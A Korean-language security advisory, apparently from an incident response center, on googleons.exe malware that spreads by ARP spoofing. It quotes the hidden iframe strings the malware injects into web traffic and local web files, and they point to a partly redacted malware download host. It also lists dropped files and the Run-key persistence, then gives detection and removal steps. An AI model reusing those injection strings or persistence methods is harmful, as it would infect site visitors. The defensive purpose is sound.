Trust Me!! Trust You!!

(1)  최근 국내에서 ARP Spoofing을 통해 감염되고,

      감염 시 네트워크를 마비시키는 악성코드가 등장하여 주의가 필요함.
(2)  특히 네트워크 관리자는 내부 네트워크에서 ARP Spoofing 공격 여부를

      주기적으로 탐지하고 공격 근원지를 파악하여

      관련 악성코드가 실행 및 다운로드 되지 않도록 주의가 필요함.

2. 전파방법

(1)  최초 googleons.exe에 감염된 PC는 ARP Spoofing 공격

 -   해당 악성코드 감염시 네트워크에 존재하는 호스트 및 게이트웨이를 대상으로

      ARP Reply를 지속적으로 보냄.

 -   게이트웨이의 MAC 주소와 공격대상 호스트의 MAC 주소를 위조하는 ARP Reply를

      지속적으로 보냄.

(2)  감염된 PC와 동일 네트워크에 연결되어 있는 호스트들은

      감염된 PC를 게이트웨이로 인식하게 하여 모든 패킷을 모니터링 및 변조할 수 있음.

 -   ARP Spoofing 공격으로 정상 호스트가 웹 접속 시 감염 PC는 패킷을 가로채고

      아래와 같은 정보를 삽입해 악성코드 유포지 사이트로 유도.

      "<iframe src=http://down.online[생략].net/page/image/zzh.htm height=0></iframe>"

(3)  악성코드 유포지 down.online[생략].net으로 유도된 PC중

      아래와 같은 윈도우 취약점 패치가 안된 사이트는 googleons.exe에 감염됨.

 -   MS05-025
 -   MS06-014
 -   MS07-017
 -   MS07-027

3. 악성행위 (googleons.exe)

(1)  감염 PC와 동일 네트워크 대역 ARP Spoofing 공격.

(2)  동일 네트워크에 존재하는 PC들의 HTTP 통신 패킷 변조.

      "<iframe src=http://down.online[생략].net/page/image/zzh.htm height=0></iframe>

      </IFRAME P ?</IFRAME IFRAME " 삽입.

(3)  USB를 통한 악성코드 전파.

(4)  감염 PC에 존재하는 .html, tml, asp, php, jsp 확장자에 아래와 같은 악성코드 삽입.

      "<iframe src=http://down.online[생략].net/page/image/pd.htm height=0></iframe>

      </IFRAME P ?</IFRAME IFRAME "

(5)  감염시 생성되는 파일

 -    C:\Document and Settings\[계정]\Local Settings\Temp
       autoexec.bat (down.exe 최초 감염 악성코드, googleons.exe를 다운로드 및 실행)

       googleons.exe
       disocoo.exe (실행뒤 삭제)
       npptools.dll
       Packet.dll
       WanPacket.dll
       yahoons.exe (실행뒤 삭제)
 -    C:\windows\system32 (yahoons.exe 실행에 의해 생성되는 파일들)
       dllhost32.exe
       mh104.dll
       moyu103.dll
       mosou.exe
       mydata.exe
       nwizwmgjs.exe
       nwizwmgjs.dll
       nwizzhuxians.exe
       nwizzhuxians.dll
       RAV00xx.exe등 다수

(6)  부팅 후 재시작 할 수 있는 레지스트리에 등록.

 -   HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

 -   이름 : svc

 -   파일 이름 : googleons.exe

4. 감염여부 확인 및 치료방법

(1)  감염여부 확인
 -    L3 또는 라우터에서 감염 PC 확인.

      중복 MAC 주소 IP 확인 (악성코드 감염 IP 확인).

 -   ARP Spoofing 피해 PC에서 공격 PC 확인.

      전체 네트워크 Ping 스캔.

      중복 MAC 주소 IP 확인.

 -   악성코드 감염 및 ARP Spoofing 공격 PC 확인.

      C:\Document and Settings\[계정]\Local Settings\Temp\googleons.exe

      존재여부 확인

      googleons.exe 프로세스 실행여부 확인 [아래 치료방법 참조]

(2)  치료방법
 -   C:\Document and Settings\[계정]\Local Settings\Temp 하위 악성코드들 삭제.

 -   윈도우 시스템 폴더에 존재하는 악성코드들 삭제.

 -   googleons.exe 프로세스 끝내기.

      [Ctrl + Alt + Del] 클릭 후 프로세스 메뉴에서 googleons.exe 프로세스 종료.

 -   레지스트리 삭제.

 ①  googleons 재시작 레지스트리 삭제.

      [시작] → [실행] 선택, "regedit" 입력 후 악성코드가 생성한 아래의 레지스트리 삭제.

      HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

 ②  기타 악성코드 레지스트리 삭제.

      [시작] → [실행] 선택, "regedit" 입력 후 악성코드가 생성한 아래의 레지스트리 삭제.

      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

5. 예방 방법

(1)  감염을 위한 사전 예방 방법

 -    윈도 OS 최신 패치 실시.

 ※ 출처 : 인터넷 침해사고 대응지원센터